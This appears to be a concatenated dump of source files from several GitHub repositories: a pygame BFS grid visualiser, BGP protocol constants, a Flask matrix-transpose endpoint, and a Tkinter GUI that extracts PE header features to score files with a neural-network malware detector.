number_str += " "
end_str = "\n" if i % self.width == self.width-1 else " "
if in_path:
print('\033[92m' + number_str + '\033[0m', end=end_str)
else:
print(number_str, end=end_str)
print(path)
if __name__ == "__main__":
b = Board(10)
paths, index = b.BFS()
if paths and index:
b.pretty_print_BFS(paths[index])
else:
print('ljfdsakfdl')
# can_move_left, can_move_right, can_move_up, can_move_down = b.can_move_from(0)
# print("can_move_left ", can_move_left)
# print("can_move_right ", can_move_right)
# print("can_move_up ", can_move_up)
# print("can_move_down ", can_move_down)
|
Python
| 191
| 35.329842
| 97
|
/lib/board.py
| 0.51333
| 0.506269
|
TheDinner22/lightning-sim
|
refs/heads/main
|
# use pygame to show the board on a window
# dependencies
import pygame, random
class Window:
def __init__(self, board):
# init py game
pygame.init()
# width height
self.WIDTH = 600
self.HEIGHT = 600
# diffenet display modes
self.display_one = False
self.display_all = False
# place holder
self.solution = []
self.display_all_c = 0
# the board to display on the window
self.board = board
# define the dimensions of the cells of the board
self.cell_width = self.WIDTH // self.board.width
# define the left padding for the grid
total_width = self.cell_width * self.board.width
self.left_padding = (self.WIDTH - total_width) // 2
# colors
self.COLORS = {
"BLACK" : (255, 255, 255),
"GREY" : (230, 230, 230),
"BLUE" : (0, 0, 255),
"RED" : (255, 0, 0),
"YELLOW" : (212, 175, 55)
}
def create_random_color(self):
return (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
def create_window(self):
# define window
self.WIN = pygame.display.set_mode( (self.WIDTH, self.HEIGHT) )
# name window
pygame.display.set_caption("LIGHT NING")
# logo/icon for window
logo = pygame.image.load("images/logo.png")
pygame.display.set_icon(logo)
def get_BFS(self):
solved = False
while not solved:
self.board.create_random_grid()
paths, index = self.board.BFS()
if paths != False and index != False:
self.solution = paths[index]
solved = True
self.paths = paths
self.solution_i = index
def draw_grid_solution(self):
fflag = True
for i in range(self.board.width * self.board.height):
if not i in self.solution: continue
# might not work
col_num = i % self.board.width
row_num = i // self.board.width
x_pos = self.left_padding + (col_num * self.cell_width)
y_pos = row_num * self.cell_width
# define rect
r = pygame.Rect(x_pos, y_pos, self.cell_width, self.cell_width)
# draw the rectangle
pygame.draw.rect(self.WIN, self.COLORS["YELLOW"], r)
def draw_BFS(self):
if self.display_all_c >= len(self.paths):
self.display_all_c = 0
# generate a color for each path
path_colors = []
for path in self.paths:
path_colors.append(self.create_random_color())
path_colors[-1] = (0, 0 ,0)
temp = self.paths.pop(self.display_all_c)
self.paths.append(temp)
for path in self.paths:
for i in path:
# might not work
col_num = i % self.board.width
row_num = i // self.board.width
x_pos = self.left_padding + (col_num * self.cell_width)
y_pos = row_num * self.cell_width
# define rect
r = pygame.Rect(x_pos, y_pos, self.cell_width, self.cell_width)
# draw the rectangle
pygame.draw.rect(self.WIN, path_colors[self.paths.index(path)], r)
self.display_all_c += 1
def draw_window(self):
self.WIN.fill(self.COLORS["GREY"])
if self.display_one:
self.draw_grid_solution()
elif self.display_all:
self.draw_BFS()
pygame.display.update()
def main(self):
# create window
self.create_window()
self.running = True
while self.running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.running = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_0:
self.get_BFS()
elif event.key == pygame.K_1:
# toggle display one
self.display_one = not self.display_one
if self.display_one:
self.display_all = False
elif event.key == pygame.K_2:
# toggle display all
self.display_all = not self.display_all
if self.display_all:
self.display_all_c = 0
self.display_one = False
self.draw_window()
if __name__ == "__main__":
win = Window()
win.main()
|
Python
| 159
| 28.754717
| 87
|
/lib/window.py
| 0.501057
| 0.487104
|
TheDinner22/lightning-sim
|
refs/heads/main
|
# this could and will be better i just needed to make it here as a
# proof of concept but it will be online and better later
import os, sys
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # adds project dir to places it looks for the modules
sys.path.append(BASE_PATH)
from lib.board import Board
from lib.window import Window
b = Board()
win = Window(b)
win.main()
|
Python
| 15
| 25.4
| 125
|
/main.py
| 0.736709
| 0.736709
|
JoeChan/openbgp
|
refs/heads/master
|
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" All BGP constant values """
# some handy things to know
BGP_MAX_PACKET_SIZE = 4096
BGP_MARKER_SIZE = 16 # size of BGP marker
BGP_HEADER_SIZE = 19 # size of BGP header, including marker
BGP_MIN_OPEN_MSG_SIZE = 29
BGP_MIN_UPDATE_MSG_SIZE = 23
BGP_MIN_NOTIFICATION_MSG_SIZE = 21
BGP_MIN_KEEPALVE_MSG_SIZE = BGP_HEADER_SIZE
BGP_TCP_PORT = 179
BGP_ROUTE_DISTINGUISHER_SIZE = 8
# BGP message types
BGP_OPEN = 1
BGP_UPDATE = 2
BGP_NOTIFICATION = 3
BGP_KEEPALIVE = 4
BGP_ROUTE_REFRESH = 5
BGP_CAPABILITY = 6
BGP_ROUTE_REFRESH_CISCO = 0x80
BGP_SIZE_OF_PATH_ATTRIBUTE = 2
# attribute flags, from RFC1771
BGP_ATTR_FLAG_OPTIONAL = 0x80
BGP_ATTR_FLAG_TRANSITIVE = 0x40
BGP_ATTR_FLAG_PARTIAL = 0x20
BGP_ATTR_FLAG_EXTENDED_LENGTH = 0x10
# SSA flags
BGP_SSA_TRANSITIVE = 0x8000
BGP_SSA_TYPE = 0x7FFF
# SSA Types
BGP_SSA_L2TPv3 = 1
BGP_SSA_mGRE = 2
BGP_SSA_IPSec = 3
BGP_SSA_MPLS = 4
BGP_SSA_L2TPv3_IN_IPSec = 5
BGP_SSA_mGRE_IN_IPSec = 6
# AS_PATH segment types
AS_SET = 1 # RFC1771
AS_SEQUENCE = 2 # RFC1771
AS_CONFED_SET = 4 # RFC1965 has the wrong values, corrected in
AS_CONFED_SEQUENCE = 3 # draft-ietf-idr-bgp-confed-rfc1965bis-01.txt
# OPEN message Optional Parameter types
BGP_OPTION_AUTHENTICATION = 1 # RFC1771
BGP_OPTION_CAPABILITY = 2 # RFC2842
# attribute types
BGPTYPE_ORIGIN = 1 # RFC1771
BGPTYPE_AS_PATH = 2 # RFC1771
BGPTYPE_NEXT_HOP = 3 # RFC1771
BGPTYPE_MULTI_EXIT_DISC = 4 # RFC1771
BGPTYPE_LOCAL_PREF = 5 # RFC1771
BGPTYPE_ATOMIC_AGGREGATE = 6 # RFC1771
BGPTYPE_AGGREGATOR = 7 # RFC1771
BGPTYPE_COMMUNITIES = 8 # RFC1997
BGPTYPE_ORIGINATOR_ID = 9 # RFC2796
BGPTYPE_CLUSTER_LIST = 10 # RFC2796
BGPTYPE_DPA = 11 # work in progress
BGPTYPE_ADVERTISER = 12 # RFC1863
BGPTYPE_RCID_PATH = 13 # RFC1863
BGPTYPE_MP_REACH_NLRI = 14 # RFC2858
BGPTYPE_MP_UNREACH_NLRI = 15 # RFC2858
BGPTYPE_EXTENDED_COMMUNITY = 16 # Draft Ramachandra
BGPTYPE_NEW_AS_PATH = 17 # draft-ietf-idr-as4bytes
BGPTYPE_NEW_AGGREGATOR = 18 # draft-ietf-idr-as4bytes
BGPTYPE_SAFI_SPECIFIC_ATTR = 19 # draft-kapoor-nalawade-idr-bgp-ssa-00.txt
BGPTYPE_TUNNEL_ENCAPS_ATTR = 23 # RFC5512
BGPTYPE_LINK_STATE = 99
BGPTYPE_ATTRIBUTE_SET = 128
# VPN Route Target #
BGP_EXT_COM_RT_0 = 0x0002 # Route Target,Format AS(2bytes):AN(4bytes)
BGP_EXT_COM_RT_1 = 0x0102 # Route Target,Format IPv4 address(4bytes):AN(2bytes)
BGP_EXT_COM_RT_2 = 0x0202 # Route Target,Format AS(4bytes):AN(2bytes)
# Route Origin (SOO site of Origin)
BGP_EXT_COM_RO_0 = 0x0003 # Route Origin,Format AS(2bytes):AN(4bytes)
BGP_EXT_COM_RO_1 = 0x0103 # Route Origin,Format IP address:AN(2bytes)
BGP_EXT_COM_RO_2 = 0x0203 # Route Origin,Format AS(2bytes):AN(4bytes)
# BGP Flow Spec
BGP_EXT_TRA_RATE = 0x8006 # traffic-rate 2-byte as#, 4-byte float
BGP_EXT_TRA_ACTION = 0x8007 # traffic-action bitmask
BGP_EXT_REDIRECT = 0x8008 # redirect 6-byte Route Target
BGP_EXT_TRA_MARK = 0x8009 # traffic-marking DSCP value
# BGP cost cummunity
BGP_EXT_COM_COST = 0x4301
# BGP link bandwith
BGP_EXT_COM_LINK_BW = 0x4004
# NLRI type as define in BGP flow spec RFC
BGPNLRI_FSPEC_DST_PFIX = 1 # RFC 5575
BGPNLRI_FSPEC_SRC_PFIX = 2 # RFC 5575
BGPNLRI_FSPEC_IP_PROTO = 3 # RFC 5575
BGPNLRI_FSPEC_PORT = 4 # RFC 5575
BGPNLRI_FSPEC_DST_PORT = 5 # RFC 5575
BGPNLRI_FSPEC_SRC_PORT = 6 # RFC 5575
BGPNLRI_FSPEC_ICMP_TP = 7 # RFC 5575
BGPNLRI_FSPEC_ICMP_CD = 8 # RFC 5575
BGPNLRI_FSPEC_TCP_FLAGS = 9 # RFC 5575
BGPNLRI_FSPEC_PCK_LEN = 10 # RFC 5575
BGPNLRI_FSPEC_DSCP = 11 # RFC 5575
BGPNLRI_FSPEC_FRAGMENT = 12 # RFC 5575
# BGP message Constants
VERSION = 4
PORT = 179
HDR_LEN = 19
MAX_LEN = 4096
# BGP messages type
MSG_OPEN = 1
MSG_UPDATE = 2
MSG_NOTIFICATION = 3
MSG_KEEPALIVE = 4
MSG_ROUTEREFRESH = 5
MSG_CISCOROUTEREFRESH = 128
# BGP Capabilities Support
SUPPORT_4AS = False
CISCO_ROUTE_REFRESH = False
NEW_ROUTE_REFRESH = False
GRACEFUL_RESTART = False
# AFI_SAFI mapping
AFI_SAFI_DICT = {
(1, 1): 'ipv4',
(1, 4): 'label_ipv4',
(1, 128): 'vpnv4',
(2, 1): 'ipv6',
(2, 4): 'label_ipv6',
(2, 128): 'vpnv6'
}
AFI_SAFI_STR_DICT = {
'ipv4': (1, 1),
'ipv6': (1, 2)
}
# BGP FSM State
ST_IDLE = 1
ST_CONNECT = 2
ST_ACTIVE = 3
ST_OPENSENT = 4
ST_OPENCONFIRM = 5
ST_ESTABLISHED = 6
# BGP Timer (seconds)
DELAY_OPEN_TIME = 10
ROUTE_REFRESH_TIME = 10
LARGER_HOLD_TIME = 4 * 60
CONNECT_RETRY_TIME = 30
IDLEHOLD_TIME = 30
HOLD_TIME = 120
stateDescr = {
ST_IDLE: "IDLE",
ST_CONNECT: "CONNECT",
ST_ACTIVE: "ACTIVE",
ST_OPENSENT: "OPENSENT",
ST_OPENCONFIRM: "OPENCONFIRM",
ST_ESTABLISHED: "ESTABLISHED"
}
# Notification error codes
ERR_MSG_HDR = 1
ERR_MSG_OPEN = 2
ERR_MSG_UPDATE = 3
ERR_HOLD_TIMER_EXPIRED = 4
ERR_FSM = 5
ERR_CEASE = 6
# Notification suberror codes
ERR_MSG_HDR_CONN_NOT_SYNC = 1
ERR_MSG_HDR_BAD_MSG_LEN = 2
ERR_MSG_HDR_BAD_MSG_TYPE = 3
ERR_MSG_OPEN_UNSUP_VERSION = 1
ERR_MSG_OPEN_BAD_PEER_AS = 2
ERR_MSG_OPEN_BAD_BGP_ID = 3
ERR_MSG_OPEN_UNSUP_OPT_PARAM = 4
ERR_MSG_OPEN_UNACCPT_HOLD_TIME = 6
ERR_MSG_OPEN_UNSUP_CAPA = 7 # RFC 5492
ERR_MSG_OPEN_UNKNO = 8
ERR_MSG_UPDATE_MALFORMED_ATTR_LIST = 1
ERR_MSG_UPDATE_UNRECOGNIZED_WELLKNOWN_ATTR = 2
ERR_MSG_UPDATE_MISSING_WELLKNOWN_ATTR = 3
ERR_MSG_UPDATE_ATTR_FLAGS = 4
ERR_MSG_UPDATE_ATTR_LEN = 5
ERR_MSG_UPDATE_INVALID_ORIGIN = 6
ERR_MSG_UPDATE_INVALID_NEXTHOP = 8
ERR_MSG_UPDATE_OPTIONAL_ATTR = 9
ERR_MSG_UPDATE_INVALID_NETWORK_FIELD = 10
ERR_MSG_UPDATE_MALFORMED_ASPATH = 11
ERR_MSG_UPDATE_UNKOWN_ATTR = 12
AttributeID_dict = {
1: 'ORIGIN',
2: 'AS_PATH',
3: 'NEXT_HOP',
4: 'MULTI_EXIT_DISC',
5: 'LOCAL_PREF',
6: 'ATOMIC_AGGREGATE',
7: 'AGGREGATOR',
8: 'COMMUNITY',
9: 'ORIGINATOR_ID',
10: 'CLUSTER_LIST',
14: 'MP_REACH_NLRI',
15: 'MP_UNREACH_NLRI',
16: 'EXTENDED_COMMUNITY',
17: 'AS4_PATH',
18: 'AS4_AGGREGATOR'
}
ATTRSTR_DICT = {
'AGGREGATOR': 7,
'AS4_AGGREGATOR': 18,
'AS4_PATH': 17,
'AS_PATH': 2,
'ATOMIC_AGGREGATE': 6,
'CLUSTER_LIST': 10,
'COMMUNITY': 8,
'EXTENDED_COMMUNITY': 16,
'LOCAL_PREFERENCE': 5,
'MP_REACH_NLRI': 14,
'MP_UNREACH_NLRI': 15,
'MULTI_EXIT_DISC': 4,
'NEXT_HOP': 3,
'ORIGIN': 1,
'ORIGINATOR_ID': 9}
TCP_MD5SIG_MAXKEYLEN = 80
SS_PADSIZE_IPV4 = 120
TCP_MD5SIG = 14
SS_PADSIZE_IPV6 = 100
SIN6_FLOWINFO = 0
SIN6_SCOPE_ID = 0
COMMUNITY_DICT = False
|
Python
| 267
| 24.932585
| 80
|
/openbgp/common/constants.py
| 0.69103
| 0.617362
|
Glitchfix/TransposeMatrixIndorse
|
refs/heads/master
|
from flask import Flask, render_template, request, jsonify
from flask_cors import CORS
import json
import numpy as np
app = Flask(__name__)
CORS(app)
@app.route('/transpose', methods=["POST"])
def homepage():
data = request.json
result = None
error = ""
try:
mat = data["matrix"]
mat = np.array(mat)
result = mat.T.tolist()
error = ""
except KeyError as e:
error = "Key %s not found" % (str(e))
pass
except Exception as e:
error = str(e)
pass
return jsonify({"result": result, "error": error})
app.run()
|
Python
| 29
| 19.724138
| 58
|
/server.py
| 0.579035
| 0.579035
|
shlsheth263/malware-detection-using-ANN
|
refs/heads/master
|
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
import test_python3
class Root(Tk):
def __init__(self):
super(Root, self).__init__()
self.title("Malware Detection")
self.minsize(500, 300)
self.labelFrame = ttk.LabelFrame(self, text = " Open File")
self.labelFrame.grid(column = 0, row = 1, padx = 200, pady = 20)
self.button()
def button(self):
self.button = ttk.Button(self.labelFrame, text = "Browse A File",command = self.fileDialog)
self.button.grid(column = 1, row = 1)
def fileDialog(self):
self.filename = filedialog.askopenfilename(initialdir = "/", title = "Select A File")
self.label = ttk.Label(self.labelFrame, text = "")
self.label.grid(column = 1, row = 2)
self.label.configure(text = self.filename)
root = Root()
root.mainloop()
|
Python
| 35
| 24.685715
| 99
|
/python/gui.py
| 0.620267
| 0.600223
|
shlsheth263/malware-detection-using-ANN
|
refs/heads/master
|
#!/usr/bin/env python
import sys
import time
import pandas as pd
import pepy
import binascii
import numpy as np
from hashlib import md5
import sklearn
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from tensorflow.keras.models import load_model
def test(p):
exe = {}
print("Signature: %s" % int(p.signature))
exe['Signature'] = int(p.signature)
exe['Magic'] = int(p.magic)
print("Machine: %s (%s)" % (int(p.machine), p.get_machine_as_str()))
exe['Machine'] = int(p.machine), p.get_machine_as_str()
print("Number of sections: %s" % p.numberofsections)
exe['Number of Sections'] = p.numberofsections
print("Number of symbols: %s" % p.numberofsymbols)
exe['Number of symbols'] = p.numberofsymbols
print("Characteristics: %s" % int(p.characteristics))
exe['characteristics'] = int(p.characteristics)
exe['timestamp'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(p.timedatestamp))
print("Timedatestamp: %s" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(p.timedatestamp)))
exe['CodeSize'] = int(p.codesize)
print("Size of code: %s" % int(p.codesize))
exe['SizeofInitial'] = int(p.initdatasize)
print("Size of initialized data: %s" % int(p.initdatasize))
exe['UninitSize'] = int(p.uninitdatasize)
print("Size of uninitialized data: %s" % int(p.uninitdatasize))
exe['Baseofcode'] = int(p.baseofcode)
print("Base address of code: %s" % int(p.baseofcode))
try:
exe['baseaddr'] = int(p.baseofdata)
print("Base address of data: %s" % int(p.baseofdata))
except:
# Not available on PE32+, ignore it.
pass
exe['imagebase'] = int(p.imagebase)
print("Image base address: %s" % int(p.imagebase))
exe['sectionalign'] = int(p.sectionalignement)
print("Section alignment: %s" % int(p.sectionalignement))
exe['filealign'] = int(p.filealignment)
print("File alignment: %s" % int(p.filealignment))
exe['imagesize'] = int(p.imagesize)
print("Size of image: %s" % int(p.imagesize))
exe['headersize'] = int(p.headersize)
print("Size of headers: %s" % int(p.headersize))
exe['checksum'] = int(p.checksum)
print("Checksum: %s" % int(p.checksum))
exe['dllchar'] = int(p.dllcharacteristics)
print("DLL characteristics: %s" % int(p.dllcharacteristics))
exe['stacksize'] = int(p.stackreservesize)
print("Size of stack reserve: %s" % int(p.stackreservesize))
exe['stackcommit'] = int(p.stackcommitsize)
print("Size of stack commit: %s" % int(p.stackcommitsize))
exe['heapsize'] = int(p.heapreservesize)
print("Size of heap reserve: %s" % int(p.heapreservesize))
exe['heapcommit'] = int(p.heapcommitsize)
print("Size of heap commit: %s" % int(p.heapcommitsize))
exe['rva'] = int(p.rvasandsize)
print("Number of RVA and sizes: %s" % int(p.rvasandsize))
ep = p.get_entry_point()
byts = p.get_bytes(ep, 8)
print("Bytes at %s: %s" % (int(ep), ' '.join(['%#2x' % b for b in byts])))
sections = p.get_sections()
print("Sections: (%i)" % len(sections))
for sect in sections:
print("[+] %s" % sect.name)
print("\tBase: %s" % int(sect.base))
print("\tLength: %s" % sect.length)
print("\tVirtual address: %s" % int(sect.virtaddr))
print("\tVirtual size: %i" % sect.virtsize)
print("\tNumber of Relocations: %i" % sect.numrelocs)
print("\tNumber of Line Numbers: %i" % sect.numlinenums)
print("\tCharacteristics: %s" % int(sect.characteristics))
if sect.length:
print("\tFirst 10 bytes: 0x%s" % binascii.hexlify(sect.data[:10]))
print("\tMD5: %s" % md5(sect.data).hexdigest())
imports = p.get_imports()
print("Imports: (%i)" % len(imports))
l = []
for imp in imports:
l.append((imp.sym, imp.name, int(imp.addr)))
# exe['symbol'] = imp.sym,imp.name,int(imp.addr)
print("[+] Symbol: %s (%s %s)" % (imp.sym, imp.name, int(imp.addr)))
exe['symbol'] = l
exports = p.get_exports()
print("Exports: (%i)" % len(exports))
for exp in exports:
exe['module'] = exp.mod, exp.func, int(exp.addr)
print("[+] Module: %s (%s %s)" % (exp.mod, exp.func, int(exp.addr)))
relocations = p.get_relocations()
print("Relocations: (%i)" % len(relocations))
for reloc in relocations:
print("[+] Type: %s (%s)" % (reloc.type, int(reloc.addr)))
resources = p.get_resources()
print("Resources: (%i)" % len(resources))
for resource in resources:
print("[+] MD5: (%i) %s" % (len(resource.data), md5(resource.data).hexdigest()))
if resource.type_str:
print("\tType string: %s" % resource.type_str)
else:
print("\tType: %s (%s)" % (int(resource.type), resource.type_as_str()))
if resource.name_str:
print("\tName string: %s" % resource.name_str)
else:
print("\tName: %s" % int(resource.name))
if resource.lang_str:
print("\tLang string: %s" % resource.lang_str)
else:
print("\tLang: %s" % int(resource.lang))
print("\tCodepage: %s" % int(resource.codepage))
print("\tRVA: %s" % int(resource.RVA))
print("\tSize: %s" % int(resource.size))
return exe
class Root(Tk):
def __init__(self):
super(Root, self).__init__()
self.mean_entropy = 6.69
self.mean_size = 6.895724 * 10 ** 6
self.mean_pointer = 5.513845 * 10 ** 5
self.mean_petype = 267
self.mean_optionalHeader = 224
self.mean_timestamp = 1.223333 * 10 ** 9
self.var = [2.45814868e+00, 5.78522477e+05, 4.59263747e-02, 3.94699109e+00
, 5.56093128e+05, 4.23275300e-02, 4.28793369e+00, 5.09558456e+05
, 4.26259209e-02, 4.52582805e+00, 5.00721420e+05, 4.38214743e-02
, 4.80847515e+00, 3.36937892e+05, 3.42121736e-02, 5.08079739e+00
, 2.82976405e+05, 3.27880482e-02, 5.19862150e+00, 2.51661820e+05
, 3.03001968e-02, 5.49108651e+00, 2.74803628e+05, 2.34008748e-02
, 5.65433567e+00, 2.61551950e+05, 2.20549168e-02, 5.82167673e+00
, 2.75945872e+05, 1.92542233e-02, 5.39081620e+00, 2.43941220e+05
, 1.66215197e-02, 5.25240971e+00, 2.13100610e+05, 1.38812852e-02
, 4.97209114e+00, 1.79580514e+05, 1.12734193e-02, 4.91835550e+00
, 1.81600442e+05, 9.08298818e-03, 4.67832320e+00, 1.75802757e+05
, 7.47834940e-03, 4.43536234e+00, 1.83062732e+05, 5.76560040e-03
, 3.36212748e+00, 1.05659050e+05, 4.12555574e-03, 3.44924796e+00
, 1.24784300e+05, 3.04785086e-03, 2.55147211e+00, 1.04770043e+05
, 2.20631168e-03, 2.63965525e+00, 1.31953132e+05, 1.50017798e-03
, 1.35032309e+13, 5.91049166e+13, 2.74411618e+08, 2.27146205e+08
, 1.30716250e+00, 1.02203650e+06, 1.64823331e+17, 9.70130473e+00
, 0.00000000e+00, 6.95117702e+14, 6.26391725e+00, 6.32965418e+14
, 0.00000000e+00, 1.39712067e+15, 3.09269595e+15, 2.53964553e+12
, 1.60595659e+06, 2.89297402e+14, 2.38878188e+15, 0.00000000e+00
, 1.35741026e+13, 8.21475966e+16, 8.55336176e-02, 1.57953396e-02
, 1.06058200e-02, 8.71010278e-03, 7.42508784e-03, 6.52156777e-03
, 5.72855385e-03, 4.99552441e-03, 4.36254449e-03, 3.93076962e-03
, 3.63767050e-03, 3.37999893e-03, 3.20280197e-03, 3.04227928e-03
, 2.93082120e-03, 2.85412932e-03, 2.79797761e-03, 2.71092621e-03
, 2.61535713e-03, 2.55340228e-03, 2.48501139e-03, 2.42902100e-03
, 2.36850195e-03, 2.29861381e-03, 2.23819994e-03, 2.17795827e-03
, 2.11676028e-03, 2.06515542e-03, 2.01478973e-03, 1.96564128e-03
, 1.91556309e-03, 1.86943149e-03, 1.83240435e-03, 1.79120738e-03
, 1.75672559e-03, 1.71652747e-03, 1.68120594e-03, 1.65315473e-03
, 1.62036128e-03, 1.59368312e-03, 1.56195259e-03, 1.53480747e-03
, 1.50568561e-03, 1.48263107e-03, 1.46131105e-03, 1.43606408e-03
, 1.41276985e-03, 1.39413270e-03, 1.37646323e-03, 1.35706705e-03]
self.mean = [3.38644034e+00, 7.43425464e+02, 6.40294006e-01, 3.41446464e+00
, 7.43311042e+02, 3.93069798e-01, 3.44198895e+00, 7.65279393e+02
, 3.30402571e-01, 3.37149071e+00, 7.42151971e+02, 2.99447860e-01
, 3.17242069e+00, 5.44187845e+02, 2.54659310e-01, 3.13009675e+00
, 4.84051874e+02, 2.31965387e-01, 3.03159921e+00, 4.77210895e+02
, 2.11030105e-01, 2.91210220e+00, 4.75812355e+02, 1.79221157e-01
, 2.48661283e+00, 4.07247419e+02, 1.46988188e-01, 2.35089123e+00
, 4.09849329e+02, 1.27373824e-01, 2.05407365e+00, 3.31339017e+02
, 1.09869680e-01, 1.83130422e+00, 2.84458239e+02, 9.13302463e-02
, 1.65633359e+00, 2.43290193e+02, 7.70382677e-02, 1.53908652e+00
, 2.37653259e+02, 6.49126524e-02, 1.40798980e+00, 2.15514487e+02
, 5.50734013e-02, 1.27721807e+00, 2.05804280e+02, 4.48429695e-02
, 9.54851129e-01, 1.16369741e+02, 3.33964758e-02, 9.08127297e-01
, 1.24898928e+02, 2.66482729e-02, 6.62233444e-01, 1.04622009e+02
, 1.90757276e-02, 6.01659959e-01, 1.28183120e+02, 1.37406010e-02
, 1.70803755e+05, 8.91260553e+05, 1.89259938e+04, 1.02192320e+04
, 6.69685927e+00, 8.22232244e+02, 1.63555414e+08, 3.32080948e+02
, 2.67000000e+02, 5.19991299e+05, 5.71698208e+00, 2.24746765e+05
, 2.67000000e+02, 6.57049714e+05, 6.93815969e+06, 6.83251704e+05
, 1.59274898e+03, 2.44727973e+06, 1.63751281e+06, 2.24000000e+02
, 1.71372990e+05, 1.22412702e+09, 3.23793663e-01, 1.76607058e-01
, 1.55393276e-01, 1.45630353e-01, 1.37842988e-01, 1.31876001e-01
, 1.25851666e-01, 1.20359017e-01, 1.15054661e-01, 1.10336582e-01
, 1.05885689e-01, 1.01550953e-01, 9.65836144e-02, 9.22891413e-02
, 8.80601110e-02, 8.45020529e-02, 8.11572167e-02, 7.87433791e-02
, 7.69100818e-02, 7.45285251e-02, 7.27705280e-02, 7.10439361e-02
, 6.96190823e-02, 6.82907176e-02, 6.71648772e-02, 6.60168642e-02
, 6.49738245e-02, 6.39356689e-02, 6.31187099e-02, 6.23316077e-02
, 6.14790592e-02, 6.07008932e-02, 5.98904188e-02, 5.90441028e-02
, 5.82944078e-02, 5.76313235e-02, 5.69379230e-02, 5.60963207e-02
, 5.53104343e-02, 5.47383798e-02, 5.40714718e-02, 5.34539907e-02
, 5.28624994e-02, 5.23242945e-02, 5.18031428e-02, 5.11818326e-02
, 5.05779398e-02, 4.99491364e-02, 4.95038547e-02, 4.90042634e-02]
self.mean=np.array(self.mean)
self.var=np.array(self.var)
def fileDialog(self):
x = test(pepy.parse(self.filename))
importedDLL = set()
importedSymbols = set()
for row in x['symbol']:
importedSymbols.add(row[0])
importedDLL.add(row[1])
self.x_list = [x['Baseofcode'], x['baseaddr'], x['characteristics'], x['dllchar'], self.mean_entropy,
x['filealign'], x['imagebase'], list(importedDLL), list(importedSymbols), x['Machine'][0],
x['Magic'], x['rva'], x['Number of Sections'], x['Number of symbols'], self.mean_petype,
self.mean_pointer, self.mean_size, x['CodeSize'], x['headersize'], x['imagesize'],
x['SizeofInitial'], self.mean_optionalHeader, x['UninitSize'], self.mean_timestamp]
y = ""
z = ""
m = np.array(self.x_list)
imported_dlls = m[7]
imported_syms = m[8]
m = np.delete(m, 7)
m = np.delete(m, 7)
m = np.reshape(m, (1, m.shape[0]))
print("m:", m)
x_test = m
n_x_test = np.zeros(shape=(x_test.shape[0], 132))
for i in range(0, x_test.shape[0]):
if i % 1000 == 0:
print(i)
row = df.iloc[i + 40001, :]
row_dlls = imported_dlls
row_syms = imported_syms
row_dlss_str=""
row_syms_str=""
for ele in row_dlls:
row_dlss_str += ele.lower() +" "
for ele in row_syms:
row_syms_str += ele.lower() +" "
print(row_dlss_str)
print(row_syms_str)
dll_tfidfs = dll_vec.transform([row_dlss_str, ]).toarray()[0]
dll_tfidf_pairs = []
for num, dll in enumerate(row_dlss_str.split()):
if num == 20:
break
dll_tfidf = dll_tfidfs[list(dll_vec.get_feature_names()).index(dll)]
dll_tfidf_pairs.append([dll_tfidf, list(dll_vec.get_feature_names()).index(dll)])
dll_tfidf_pairs = np.array(dll_tfidf_pairs)
# print(dll_tfidf_pairs)
dll_tfidf_pairs = dll_tfidf_pairs[dll_tfidf_pairs[:, 0].argsort()[::-1]]
for j, pair in enumerate(dll_tfidf_pairs):
name = dll_vec.get_feature_names()[int(pair[1])]
if name in scrape_dict:
n_x_test[i, 3 * j] = scrape_dict[name][0]
n_x_test[i, 3 * j + 1] = scrape_dict[name][1]
n_x_test[i, 3 * j + 2] = pair[0]
else:
n_x_test[i, 3 * j] = 1
n_x_test[i, 3 * j + 1] = 4
n_x_test[i, 3 * j + 2] = pair[0]
# print(ip1_train)
sym_tfidf = sym_vec.transform([row_syms_str, ]).toarray()[0]
sym_tfidf = sorted(sym_tfidf, reverse=True)[:50]
ip2_train = np.append(x_test[i], sym_tfidf)
n_x_test[i, 60:] = ip2_train
num = model.predict((n_x_test - self.mean) / (self.var ** 0.5 + 0.069))
print("NUM" + str(num))
if num >= 0 and num <= 0.3:
y = "Low"
z = "Good to use"
elif num > 0.3 and num <= 0.6:
y = "Medium"
z = "Can be used"
elif num > 0.6 and num <= 1:
y = "High"
z = "Avoid Using"
else:
y = "Out of range"
z = "Cant determine"
self.label.config(text="Recommendation : " + y)
self.label = ttk.Label(self.labelFrame, text="")
self.label.grid(column=1, row=3)
self.label.config(text=z)
df = pd.read_csv("brazilian-malware.csv")
df = df.drop(columns=["Identify", "SHA1", "FirstSeenDate"])
idll = df.loc[:, "ImportedDlls"]
idll = set(idll)
dlls = set()
for row in idll:
for dll in row.split():
dlls.add(dll)
isyms = df.loc[:, "ImportedSymbols"]
isyms = set(isyms)
syms = set()
for row in isyms:
for dll in row.split():
syms.add(dll)
df_temp = df.drop(columns=["ImportedDlls", "ImportedSymbols"])
x_train = np.array(df_temp.drop(columns=["Label"]).iloc[:40001, :])
y_train = np.array(df_temp.iloc[:40001, :].loc[:, "Label"])
x_test = np.array(df_temp.drop(columns=["Label"]).iloc[40001:, :])
y_test = np.array(df_temp.iloc[40001:, :].loc[:, "Label"])
from sklearn.feature_extraction.text import TfidfVectorizer
dll_vec = TfidfVectorizer(smooth_idf=False, analyzer="word", tokenizer=lambda x: x.split())
x = dll_vec.fit_transform(list(df.loc[:, "ImportedDlls"]))
sym_vec = TfidfVectorizer(smooth_idf=False, analyzer="word", tokenizer=lambda x: x.split())
x = sym_vec.fit_transform(list(df.loc[:, "ImportedSymbols"]))
df_scrape = pd.read_csv("spithack1.csv").drop(['Description'], axis=1)
np_scrape = df_scrape.values
scrape_dict = {}
for i, row in enumerate(np_scrape):
if not row[1] == "-1":
name = row[0].replace("_dll", ".dll")
pop = -1
if "Very Low" in row[1]:
pop = 1
if "Low" in row[1]:
